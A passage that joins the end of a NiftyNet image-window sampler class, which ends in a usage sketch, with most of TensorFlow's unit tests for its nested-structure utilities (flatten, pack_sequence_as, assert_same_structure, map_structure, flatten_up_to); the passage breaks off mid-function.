output_shapes=self.tf_shapes)
# dataset: slice the n-element window into n single windows
dataset = dataset.flat_map(map_func=tf.data.Dataset.from_tensor_slices)
return dataset
def run_threads(self, *_args, **_kwargs):
"""
This function is created for compatibility purposes
(Deprecating)
:param _args:
:param _kwargs:
:return:
"""
pass
# if self.dataset is None or self.iterator is None:
# self.init_dataset()
# self.iterator = self.dataset.make_one_shot_iterator()
# self.iterator = tf.data.Iterator.from_structure(
# self.dataset.output_types, self.dataset.output_shapes)
# sess = session or tf.get_default_session()
# if sess is not None:
# sess.run(self.iterator.make_initializer(self.dataset))
def close_all(self):
"""
For compatibility with the queue-based sampler.
"""
if self._enqueuer is not None:
self._enqueuer.stop()
@classmethod
def dummy_coordinates(cls, image_id, image_sizes, n_samples):
"""
This function returns a set of image window coordinates
that simply span the whole image, from 0 to `image_sizes` spatially.
:return: a numpy array of `n_samples` spatial coordinates
"""
starting_coordinates = [0, 0, 0]
image_spatial_shape = list(image_sizes[:N_SPATIAL])
coords = [image_id] + starting_coordinates + image_spatial_shape
coords = np.tile(np.asarray(coords), [n_samples, 1])
return coords.astype(BUFFER_POSITION_NP_TYPE)
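# A minimal usage sketch (not part of NiftyNet): it assumes a generator-based
# sampler that overrides ``tf_shapes``/``tf_dtypes`` instead of relying on an
# ImageReader, and only illustrates the ``init_dataset``/``pop_batch_op`` flow
# described above. The window size, the random data and the int32 location
# dtype are illustrative assumptions, not part of the library API.
if __name__ == '__main__':
    class _RandomWindowSampler(ImageWindowDataset):
        """Yields ten random 2x2x2 single-channel windows with dummy locations."""

        def layer_op(self):
            for image_id in range(10):
                image = np.random.rand(1, 2, 2, 2, 1, 1).astype(np.float32)
                coords = self.dummy_coordinates(image_id, (2, 2, 2), 1)
                yield {'image': image,
                       LOCATION_FORMAT.format('image'): coords}

        @property
        def tf_shapes(self):
            return {'image': tf.TensorShape([1, 2, 2, 2, 1, 1]),
                    LOCATION_FORMAT.format('image'): tf.TensorShape([1, 7])}

        @property
        def tf_dtypes(self):
            return {'image': tf.float32,
                    LOCATION_FORMAT.format('image'): tf.int32}

    sampler = _RandomWindowSampler(batch_size=2, shuffle=False)
    batch = sampler.pop_batch_op()  # dict of (squeezed) batched window tensors
    with tf.Session() as sess:
        print(sess.run(batch)['image'].shape)
    sampler.close_all()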
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for utilities working with arbitrarily nested structures."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import time
from absl.testing import parameterized
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.util import nest
from tensorflow.python.util.compat import collections_abc
try:
import attr # pylint:disable=g-import-not-at-top
except ImportError:
attr = None
class _CustomMapping(collections_abc.Mapping):
def __init__(self, *args, **kwargs):
self._wrapped = dict(*args, **kwargs)
def __getitem__(self, key):
return self._wrapped[key]
def __iter__(self):
return iter(self._wrapped)
def __len__(self):
return len(self._wrapped)
class _CustomSequenceThatRaisesException(collections_abc.Sequence):
def __len__(self):
return 1
def __getitem__(self, item):
raise ValueError("Cannot get item: %s" % item)
class NestTest(parameterized.TestCase, test.TestCase):
PointXY = collections.namedtuple("Point", ["x", "y"]) # pylint: disable=invalid-name
unsafe_map_pattern = ("nest cannot guarantee that it is safe to map one to "
"the other.")
bad_pack_pattern = ("Attempted to pack value:\n .+\ninto a sequence, but "
"found incompatible type `<(type|class) 'str'>` instead.")
if attr:
class BadAttr(object):
"""Class that has a non-iterable __attrs_attrs__."""
__attrs_attrs__ = None
@attr.s
class SampleAttr(object):
field1 = attr.ib()
field2 = attr.ib()
@attr.s
class UnsortedSampleAttr(object):
field3 = attr.ib()
field1 = attr.ib()
field2 = attr.ib()
@test_util.assert_no_new_pyobjects_executing_eagerly
def testAttrsFlattenAndPack(self):
if attr is None:
self.skipTest("attr module is unavailable.")
field_values = [1, 2]
sample_attr = NestTest.SampleAttr(*field_values)
self.assertFalse(nest._is_attrs(field_values))
self.assertTrue(nest._is_attrs(sample_attr))
flat = nest.flatten(sample_attr)
self.assertEqual(field_values, flat)
restructured_from_flat = nest.pack_sequence_as(sample_attr, flat)
self.assertIsInstance(restructured_from_flat, NestTest.SampleAttr)
self.assertEqual(restructured_from_flat, sample_attr)
# Check that flatten fails if attributes are not iterable
with self.assertRaisesRegexp(TypeError, "object is not iterable"):
flat = nest.flatten(NestTest.BadAttr())
@parameterized.parameters(
{"values": [1, 2, 3]},
{"values": [{"B": 10, "A": 20}, [1, 2], 3]},
{"values": [(1, 2), [3, 4], 5]},
{"values": [PointXY(1, 2), 3, 4]},
)
@test_util.assert_no_new_pyobjects_executing_eagerly
def testAttrsMapStructure(self, values):
if attr is None:
self.skipTest("attr module is unavailable.")
structure = NestTest.UnsortedSampleAttr(*values)
new_structure = nest.map_structure(lambda x: x, structure)
self.assertEqual(structure, new_structure)
@test_util.assert_no_new_pyobjects_executing_eagerly
def testFlattenAndPack(self):
structure = ((3, 4), 5, (6, 7, (9, 10), 8))
flat = ["a", "b", "c", "d", "e", "f", "g", "h"]
self.assertEqual(nest.flatten(structure), [3, 4, 5, 6, 7, 9, 10, 8])
self.assertEqual(
nest.pack_sequence_as(structure, flat), (("a", "b"), "c",
("d", "e", ("f", "g"), "h")))
structure = (NestTest.PointXY(x=4, y=2),
((NestTest.PointXY(x=1, y=0),),))
flat = [4, 2, 1, 0]
self.assertEqual(nest.flatten(structure), flat)
restructured_from_flat = nest.pack_sequence_as(structure, flat)
self.assertEqual(restructured_from_flat, structure)
self.assertEqual(restructured_from_flat[0].x, 4)
self.assertEqual(restructured_from_flat[0].y, 2)
self.assertEqual(restructured_from_flat[1][0][0].x, 1)
self.assertEqual(restructured_from_flat[1][0][0].y, 0)
self.assertEqual([5], nest.flatten(5))
self.assertEqual([np.array([5])], nest.flatten(np.array([5])))
self.assertEqual("a", nest.pack_sequence_as(5, ["a"]))
self.assertEqual(
np.array([5]), nest.pack_sequence_as("scalar", [np.array([5])]))
with self.assertRaisesRegexp(
ValueError, self.unsafe_map_pattern):
nest.pack_sequence_as("scalar", [4, 5])
with self.assertRaisesRegexp(TypeError, self.bad_pack_pattern):
nest.pack_sequence_as([4, 5], "bad_sequence")
with self.assertRaises(ValueError):
nest.pack_sequence_as([5, 6, [7, 8]], ["a", "b", "c"])
@parameterized.parameters({"mapping_type": collections.OrderedDict},
{"mapping_type": _CustomMapping})
@test_util.assert_no_new_pyobjects_executing_eagerly
def testFlattenDictOrder(self, mapping_type):
"""`flatten` orders dicts by key, including OrderedDicts."""
ordered = mapping_type([("d", 3), ("b", 1), ("a", 0), ("c", 2)])
plain = {"d": 3, "b": 1, "a": 0, "c": 2}
ordered_flat = nest.flatten(ordered)
plain_flat = nest.flatten(plain)
self.assertEqual([0, 1, 2, 3], ordered_flat)
self.assertEqual([0, 1, 2, 3], plain_flat)
@parameterized.parameters({"mapping_type": collections.OrderedDict},
{"mapping_type": _CustomMapping})
def testPackDictOrder(self, mapping_type):
"""Packing orders dicts by key, including OrderedDicts."""
custom = mapping_type([("d", 0), ("b", 0), ("a", 0), ("c", 0)])
plain = {"d": 0, "b": 0, "a": 0, "c": 0}
seq = [0, 1, 2, 3]
custom_reconstruction = nest.pack_sequence_as(custom, seq)
plain_reconstruction = nest.pack_sequence_as(plain, seq)
self.assertIsInstance(custom_reconstruction, mapping_type)
self.assertIsInstance(plain_reconstruction, dict)
self.assertEqual(
mapping_type([("d", 3), ("b", 1), ("a", 0), ("c", 2)]),
custom_reconstruction)
self.assertEqual({"d": 3, "b": 1, "a": 0, "c": 2}, plain_reconstruction)
@test_util.assert_no_new_pyobjects_executing_eagerly
def testFlattenAndPackMappingViews(self):
"""`flatten` orders dicts by key, including OrderedDicts."""
ordered = collections.OrderedDict([("d", 3), ("b", 1), ("a", 0), ("c", 2)])
# test flattening
ordered_keys_flat = nest.flatten(ordered.keys())
ordered_values_flat = nest.flatten(ordered.values())
ordered_items_flat = nest.flatten(ordered.items())
self.assertEqual([3, 1, 0, 2], ordered_values_flat)
self.assertEqual(["d", "b", "a", "c"], ordered_keys_flat)
self.assertEqual(["d", 3, "b", 1, "a", 0, "c", 2], ordered_items_flat)
# test packing
self.assertEqual([("d", 3), ("b", 1), ("a", 0), ("c", 2)],
nest.pack_sequence_as(ordered.items(), ordered_items_flat))
Abc = collections.namedtuple("A", ("b", "c")) # pylint: disable=invalid-name
@test_util.assert_no_new_pyobjects_executing_eagerly
def testFlattenAndPack_withDicts(self):
# A nice messy mix of tuples, lists, dicts, and `OrderedDict`s.
mess = [
"z",
NestTest.Abc(3, 4), {
"d": _CustomMapping({
41: 4
}),
"c": [
1,
collections.OrderedDict([
("b", 3),
("a", 2),
]),
],
"b": 5
}, 17
]
flattened = nest.flatten(mess)
self.assertEqual(flattened, ["z", 3, 4, 5, 1, 2, 3, 4, 17])
structure_of_mess = [
14,
NestTest.Abc("a", True),
{
"d": _CustomMapping({
41: 42
}),
"c": [
0,
collections.OrderedDict([
("b", 9),
("a", 8),
]),
],
"b": 3
},
"hi everybody",
]
unflattened = nest.pack_sequence_as(structure_of_mess, flattened)
self.assertEqual(unflattened, mess)
# Check also that the OrderedDict was created, with the correct key order.
unflattened_ordered_dict = unflattened[2]["c"][1]
self.assertIsInstance(unflattened_ordered_dict, collections.OrderedDict)
self.assertEqual(list(unflattened_ordered_dict.keys()), ["b", "a"])
unflattened_custom_mapping = unflattened[2]["d"]
self.assertIsInstance(unflattened_custom_mapping, _CustomMapping)
self.assertEqual(list(unflattened_custom_mapping.keys()), [41])
def testFlatten_numpyIsNotFlattened(self):
structure = np.array([1, 2, 3])
flattened = nest.flatten(structure)
self.assertLen(flattened, 1)
def testFlatten_stringIsNotFlattened(self):
structure = "lots of letters"
flattened = nest.flatten(structure)
self.assertLen(flattened, 1)
unflattened = nest.pack_sequence_as("goodbye", flattened)
self.assertEqual(structure, unflattened)
def testPackSequenceAs_notIterableError(self):
with self.assertRaisesRegexp(
TypeError, self.bad_pack_pattern):
nest.pack_sequence_as("hi", "bye")
def testPackSequenceAs_wrongLengthsError(self):
with self.assertRaisesRegexp(
ValueError,
"Structure had 2 elements, but flat_sequence had 3 elements."):
nest.pack_sequence_as(["hello", "world"],
["and", "goodbye", "again"])
@test_util.assert_no_new_pyobjects_executing_eagerly
def testIsNested(self):
self.assertFalse(nest.is_nested("1234"))
self.assertTrue(nest.is_nested([1, 3, [4, 5]]))
self.assertTrue(nest.is_nested(((7, 8), (5, 6))))
self.assertTrue(nest.is_nested([]))
self.assertTrue(nest.is_nested({"a": 1, "b": 2}))
self.assertTrue(nest.is_nested({"a": 1, "b": 2}.keys()))
self.assertTrue(nest.is_nested({"a": 1, "b": 2}.values()))
self.assertTrue(nest.is_nested({"a": 1, "b": 2}.items()))
self.assertFalse(nest.is_nested(set([1, 2])))
ones = array_ops.ones([2, 3])
self.assertFalse(nest.is_nested(ones))
self.assertFalse(nest.is_nested(math_ops.tanh(ones)))
self.assertFalse(nest.is_nested(np.ones((4, 5))))
@parameterized.parameters({"mapping_type": _CustomMapping},
{"mapping_type": dict})
def testFlattenDictItems(self, mapping_type):
dictionary = mapping_type({(4, 5, (6, 8)): ("a", "b", ("c", "d"))})
flat = {4: "a", 5: "b", 6: "c", 8: "d"}
self.assertEqual(nest.flatten_dict_items(dictionary), flat)
with self.assertRaises(TypeError):
nest.flatten_dict_items(4)
bad_dictionary = mapping_type({(4, 5, (4, 8)): ("a", "b", ("c", "d"))})
with self.assertRaisesRegexp(ValueError, "not unique"):
nest.flatten_dict_items(bad_dictionary)
another_bad_dictionary = mapping_type({
(4, 5, (6, 8)): ("a", "b", ("c", ("d", "e")))
})
with self.assertRaisesRegexp(
ValueError, "Key had [0-9]* elements, but value had [0-9]* elements"):
nest.flatten_dict_items(another_bad_dictionary)
# pylint does not correctly recognize these as class names and
# suggests to use variable style under_score naming.
# pylint: disable=invalid-name
Named0ab = collections.namedtuple("named_0", ("a", "b"))
Named1ab = collections.namedtuple("named_1", ("a", "b"))
SameNameab = collections.namedtuple("same_name", ("a", "b"))
SameNameab2 = collections.namedtuple("same_name", ("a", "b"))
SameNamexy = collections.namedtuple("same_name", ("x", "y"))
SameName1xy = collections.namedtuple("same_name_1", ("x", "y"))
SameName1xy2 = collections.namedtuple("same_name_1", ("x", "y"))
NotSameName = collections.namedtuple("not_same_name", ("a", "b"))
# pylint: enable=invalid-name
class SameNamedType1(SameNameab):
pass
@test_util.assert_no_new_pyobjects_executing_eagerly
def testAssertSameStructure(self):
structure1 = (((1, 2), 3), 4, (5, 6))
structure2 = ((("foo1", "foo2"), "foo3"), "foo4", ("foo5", "foo6"))
structure_different_num_elements = ("spam", "eggs")
structure_different_nesting = (((1, 2), 3), 4, 5, (6,))
nest.assert_same_structure(structure1, structure2)
nest.assert_same_structure("abc", 1.0)
nest.assert_same_structure("abc", np.array([0, 1]))
nest.assert_same_structure("abc", constant_op.constant([0, 1]))
with self.assertRaisesRegexp(
ValueError,
("The two structures don't have the same nested structure\\.\n\n"
"First structure:.*?\n\n"
"Second structure:.*\n\n"
"More specifically: Substructure "
r'"type=tuple str=\(\(1, 2\), 3\)" is a sequence, while '
'substructure "type=str str=spam" is not\n'
"Entire first structure:\n"
r"\(\(\(\., \.\), \.\), \., \(\., \.\)\)\n"
"Entire second structure:\n"
r"\(\., \.\)")):
nest.assert_same_structure(structure1, structure_different_num_elements)
with self.assertRaisesRegexp(
ValueError,
("The two structures don't have the same nested structure\\.\n\n"
"First structure:.*?\n\n"
"Second structure:.*\n\n"
r'More specifically: Substructure "type=list str=\[0, 1\]" '
r'is a sequence, while substructure "type=ndarray str=\[0 1\]" '
"is not")):
nest.assert_same_structure([0, 1], np.array([0, 1]))
with self.assertRaisesRegexp(
ValueError,
("The two structures don't have the same nested structure\\.\n\n"
"First structure:.*?\n\n"
"Second structure:.*\n\n"
r'More specifically: Substructure "type=list str=\[0, 1\]" '
'is a sequence, while substructure "type=int str=0" '
"is not")):
nest.assert_same_structure(0, [0, 1])
self.assertRaises(TypeError, nest.assert_same_structure, (0, 1), [0, 1])
with self.assertRaisesRegexp(
ValueError,
("don't have the same nested structure\\.\n\n"
"First structure: .*?\n\nSecond structure: ")):
nest.assert_same_structure(structure1, structure_different_nesting)
self.assertRaises(TypeError, nest.assert_same_structure, (0, 1),
NestTest.Named0ab("a", "b"))
nest.assert_same_structure(NestTest.Named0ab(3, 4),
NestTest.Named0ab("a", "b"))
self.assertRaises(TypeError, nest.assert_same_structure,
NestTest.Named0ab(3, 4), NestTest.Named1ab(3, 4))
with self.assertRaisesRegexp(
ValueError,
("don't have the same nested structure\\.\n\n"
"First structure: .*?\n\nSecond structure: ")):
nest.assert_same_structure(NestTest.Named0ab(3, 4),
NestTest.Named0ab([3], 4))
with self.assertRaisesRegexp(
ValueError,
("don't have the same nested structure\\.\n\n"
"First structure: .*?\n\nSecond structure: ")):
nest.assert_same_structure([[3], 4], [3, [4]])
structure1_list = [[[1, 2], 3], 4, [5, 6]]
with self.assertRaisesRegexp(TypeError,
"don't have the same sequence type"):
nest.assert_same_structure(structure1, structure1_list)
nest.assert_same_structure(structure1, structure2, check_types=False)
nest.assert_same_structure(structure1, structure1_list, check_types=False)
with self.assertRaisesRegexp(ValueError,
"don't have the same set of keys"):
nest.assert_same_structure({"a": 1}, {"b": 1})
nest.assert_same_structure(NestTest.SameNameab(0, 1),
NestTest.SameNameab2(2, 3))
# This assertion is expected to pass: two namedtuples with the same
# name and field names are considered to be identical.
nest.assert_same_structure(
NestTest.SameNameab(NestTest.SameName1xy(0, 1), 2),
NestTest.SameNameab2(NestTest.SameName1xy2(2, 3), 4))
expected_message = "The two structures don't have the same.*"
with self.assertRaisesRegexp(ValueError, expected_message):
nest.assert_same_structure(
NestTest.SameNameab(0, NestTest.SameNameab2(1, 2)),
NestTest.SameNameab2(NestTest.SameNameab(0, 1), 2))
self.assertRaises(TypeError, nest.assert_same_structure,
NestTest.SameNameab(0, 1), NestTest.NotSameName(2, 3))
self.assertRaises(TypeError, nest.assert_same_structure,
NestTest.SameNameab(0, 1), NestTest.SameNamexy(2, 3))
self.assertRaises(TypeError, nest.assert_same_structure,
NestTest.SameNameab(0, 1), NestTest.SameNamedType1(2, 3))
EmptyNT = collections.namedtuple("empty_nt", "") # pylint: disable=invalid-name
def testHeterogeneousComparison(self):
nest.assert_same_structure({"a": 4}, _CustomMapping(a=3))
nest.assert_same_structure(_CustomMapping(b=3), {"b": 4})
@test_util.assert_no_new_pyobjects_executing_eagerly
def testMapStructure(self):
structure1 = (((1, 2), 3), 4, (5, 6))
structure2 = (((7, 8), 9), 10, (11, 12))
structure1_plus1 = nest.map_structure(lambda x: x + 1, structure1)
nest.assert_same_structure(structure1, structure1_plus1)
self.assertAllEqual(
[2, 3, 4, 5, 6, 7],
nest.flatten(structure1_plus1))
structure1_plus_structure2 = nest.map_structure(
lambda x, y: x + y, structure1, structure2)
self.assertEqual(
(((1 + 7, 2 + 8), 3 + 9), 4 + 10, (5 + 11, 6 + 12)),
structure1_plus_structure2)
self.assertEqual(3, nest.map_structure(lambda x: x - 1, 4))
self.assertEqual(7, nest.map_structure(lambda x, y: x + y, 3, 4))
structure3 = collections.defaultdict(list)
structure3["a"] = [1, 2, 3, 4]
structure3["b"] = [2, 3, 4, 5]
expected_structure3 = collections.defaultdict(list)
expected_structure3["a"] = [2, 3, 4, 5]
expected_structure3["b"] = [3, 4, 5, 6]
self.assertEqual(expected_structure3,
nest.map_structure(lambda x: x + 1, structure3))
# Empty structures
self.assertEqual((), nest.map_structure(lambda x: x + 1, ()))
self.assertEqual([], nest.map_structure(lambda x: x + 1, []))
self.assertEqual({}, nest.map_structure(lambda x: x + 1, {}))
self.assertEqual(NestTest.EmptyNT(), nest.map_structure(lambda x: x + 1,
NestTest.EmptyNT()))
# This is checking actual equality of types, empty list != empty tuple
self.assertNotEqual((), nest.map_structure(lambda x: x + 1, []))
with self.assertRaisesRegexp(TypeError, "callable"):
nest.map_structure("bad", structure1_plus1)
with self.assertRaisesRegexp(ValueError, "at least one structure"):
nest.map_structure(lambda x: x)
with self.assertRaisesRegexp(ValueError, "same number of elements"):
nest.map_structure(lambda x, y: None, (3, 4), (3, 4, 5))
with self.assertRaisesRegexp(ValueError, "same nested structure"):
nest.map_structure(lambda x, y: None, 3, (3,))
with self.assertRaisesRegexp(TypeError, "same sequence type"):
nest.map_structure(lambda x, y: None, ((3, 4), 5), [(3, 4), 5])
with self.assertRaisesRegexp(ValueError, "same nested structure"):
nest.map_structure(lambda x, y: None, ((3, 4), 5), (3, (4, 5)))
structure1_list = [[[1, 2], 3], 4, [5, 6]]
with self.assertRaisesRegexp(TypeError, "same sequence type"):
nest.map_structure(lambda x, y: None, structure1, structure1_list)
nest.map_structure(lambda x, y: None, structure1, structure1_list,
check_types=False)
with self.assertRaisesRegexp(ValueError, "same nested structure"):
nest.map_structure(lambda x, y: None, ((3, 4), 5), (3, (4, 5)),
check_types=False)
with self.assertRaisesRegexp(ValueError,
"Only valid keyword argument.*foo"):
nest.map_structure(lambda x: None, structure1, foo="a")
with self.assertRaisesRegexp(ValueError,
"Only valid keyword argument.*foo"):
nest.map_structure(lambda x: None, structure1, check_types=False, foo="a")
ABTuple = collections.namedtuple("ab_tuple", "a, b") # pylint: disable=invalid-name
@test_util.assert_no_new_pyobjects_executing_eagerly
def testMapStructureWithStrings(self):
inp_a = NestTest.ABTuple(a="foo", b=("bar", "baz"))
inp_b = NestTest.ABTuple(a=2, b=(1, 3))
out = nest.map_structure(lambda string, repeats: string * repeats,
inp_a,
inp_b)
self.assertEqual("foofoo", out.a)
self.assertEqual("bar", out.b[0])
self.assertEqual("bazbazbaz", out.b[1])
nt = NestTest.ABTuple(a=("something", "something_else"),
b="yet another thing")
rev_nt = nest.map_structure(lambda x: x[::-1], nt)
# Check the output is the correct structure, and all strings are reversed.
nest.assert_same_structure(nt, rev_nt)
self.assertEqual(nt.a[0][::-1], rev_nt.a[0])
self.assertEqual(nt.a[1][::-1], rev_nt.a[1])
self.assertEqual(nt.b[::-1], rev_nt.b)
@test_util.run_deprecated_v1
def testMapStructureOverPlaceholders(self):
inp_a = (array_ops.placeholder(dtypes.float32, shape=[3, 4]),
array_ops.placeholder(dtypes.float32, shape=[3, 7]))
inp_b = (array_ops.placeholder(dtypes.float32, shape=[3, 4]),
array_ops.placeholder(dtypes.float32, shape=[3, 7]))
output = nest.map_structure(lambda x1, x2: x1 + x2, inp_a, inp_b)
nest.assert_same_structure(output, inp_a)
self.assertShapeEqual(np.zeros((3, 4)), output[0])
self.assertShapeEqual(np.zeros((3, 7)), output[1])
feed_dict = {
inp_a: (np.random.randn(3, 4), np.random.randn(3, 7)),
inp_b: (np.random.randn(3, 4), np.random.randn(3, 7))
}
with self.cached_session() as sess:
output_np = sess.run(output, feed_dict=feed_dict)
self.assertAllClose(output_np[0],
feed_dict[inp_a][0] + feed_dict[inp_b][0])
self.assertAllClose(output_np[1],
feed_dict[inp_a][1] + feed_dict[inp_b][1])
def testAssertShallowStructure(self):
inp_ab = ["a", "b"]
inp_abc = ["a", "b", "c"]
with self.assertRaisesWithLiteralMatch( # pylint: disable=g-error-prone-assert-raises
ValueError,
nest._STRUCTURES_HAVE_MISMATCHING_LENGTHS.format(
input_length=len(inp_ab),
shallow_length=len(inp_abc))):
nest.assert_shallow_structure(inp_abc, inp_ab)
inp_ab1 = [(1, 1), (2, 2)]
inp_ab2 = [[1, 1], [2, 2]]
with self.assertRaisesWithLiteralMatch(
TypeError,
nest._STRUCTURES_HAVE_MISMATCHING_TYPES.format(
shallow_type=type(inp_ab2[0]),
input_type=type(inp_ab1[0]))):
nest.assert_shallow_structure(inp_ab2, inp_ab1)
nest.assert_shallow_structure(inp_ab2, inp_ab1, check_types=False)
inp_ab1 = {"a": (1, 1), "b": {"c": (2, 2)}}
inp_ab2 = {"a": (1, 1), "b": {"d": (2, 2)}}
with self.assertRaisesWithLiteralMatch(
ValueError,
nest._SHALLOW_TREE_HAS_INVALID_KEYS.format(["d"])):
nest.assert_shallow_structure(inp_ab2, inp_ab1)
inp_ab = collections.OrderedDict([("a", 1), ("b", (2, 3))])
inp_ba = collections.OrderedDict([("b", (2, 3)), ("a", 1)])
nest.assert_shallow_structure(inp_ab, inp_ba)
# This assertion is expected to pass: two namedtuples with the same
# name and field names are considered to be identical.
inp_shallow = NestTest.SameNameab(1, 2)
inp_deep = NestTest.SameNameab2(1, [1, 2, 3])
nest.assert_shallow_structure(inp_shallow, inp_deep, check_types=False)
nest.assert_shallow_structure(inp_shallow, inp_deep, check_types=True)
def testFlattenUpTo(self):
# Shallow tree ends at scalar.
input_tree = [[[2, 2], [3, 3]], [[4, 9], [5, 5]]]
shallow_tree = [[True, True], [False, True]]
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [[2, 2], [3, 3], [4, 9], [5, 5]])
self.assertEqual(flattened_shallow_tree, [True, True, False, True])
# Shallow tree ends at string.
input_tree = [[("a", 1), [("b", 2), [("c", 3), [("d", 4)]]]]]
shallow_tree = [["level_1", ["level_2", ["level_3", ["level_4"]]]]]
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
input_tree_flattened = nest.flatten(input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[("a", 1), ("b", 2), ("c", 3), ("d", 4)])
self.assertEqual(input_tree_flattened, ["a", 1, "b", 2, "c", 3, "d", 4])
# Make sure dicts are correctly flattened, yielding values, not keys.
input_tree = {"a": 1, "b": {"c": 2}, "d": [3, (4, 5)]}
shallow_tree = {"a": 0, "b": 0, "d": [0, 0]}
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[1, {"c": 2}, 3, (4, 5)])
# Namedtuples.
ab_tuple = NestTest.ABTuple
input_tree = ab_tuple(a=[0, 1], b=2)
shallow_tree = ab_tuple(a=0, b=1)
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[[0, 1], 2])
# Nested dicts, OrderedDicts and namedtuples.
input_tree = collections.OrderedDict(
[("a", ab_tuple(a=[0, {"b": 1}], b=2)),
("c", {"d": 3, "e": collections.OrderedDict([("f", 4)])})])
shallow_tree = input_tree
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree, [0, 1, 2, 3, 4])
shallow_tree = collections.OrderedDict([("a", 0), ("c", {"d": 3, "e": 1})])
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[ab_tuple(a=[0, {"b": 1}], b=2),
3,
collections.OrderedDict([("f", 4)])])
shallow_tree = collections.OrderedDict([("a", 0), ("c", 0)])
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[ab_tuple(a=[0, {"b": 1}], b=2),
{"d": 3, "e": collections.OrderedDict([("f", 4)])}])
## Shallow non-list edge-case.
# Using iterable elements.
input_tree = ["input_tree"]
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = ["input_tree_0", "input_tree_1"]
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Using non-iterable elements.
input_tree = [0]
shallow_tree = 9
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = [0, 1]
shallow_tree = 9
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Both non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Using non-iterable elements.
input_tree = 0
shallow_tree = 0
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Input non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = ["shallow_tree"]
expected_message = ("If shallow structure is a sequence, input must also "
"be a sequence. Input has type: <(type|class) 'str'>.")
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, shallow_tree)
input_tree = "input_tree"
shallow_tree = ["shallow_tree_9", "shallow_tree_8"]
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, shallow_tree)
# Using non-iterable elements.
input_tree = 0
shallow_tree = [9]
expected_message = ("If shallow structure is a sequence, input must also "
"be a sequence. Input has type: <(type|class) 'int'>.")
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, shallow_tree)
input_tree = 0
shallow_tree = [9, 8]
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, shallow_tree)
input_tree = [(1,), (2,), 3]
shallow_tree = [(1,), (2,)]
expected_message = nest._STRUCTURES_HAVE_MISMATCHING_LENGTHS.format(
input_length=len(input_tree), shallow_length=len(shallow_tree))
with self.assertRaisesRegexp(ValueError, expected_message): # pylint: disable=g-error-prone-assert-raises
nest.assert_shallow_structure(shallow_tree, input_tree)
def testFlattenWithTuplePathsUpTo(self):
def get_paths_and_values(shallow_tree, input_tree):
path_value_pairs = nest.flatten_with_tuple_paths_up_to(
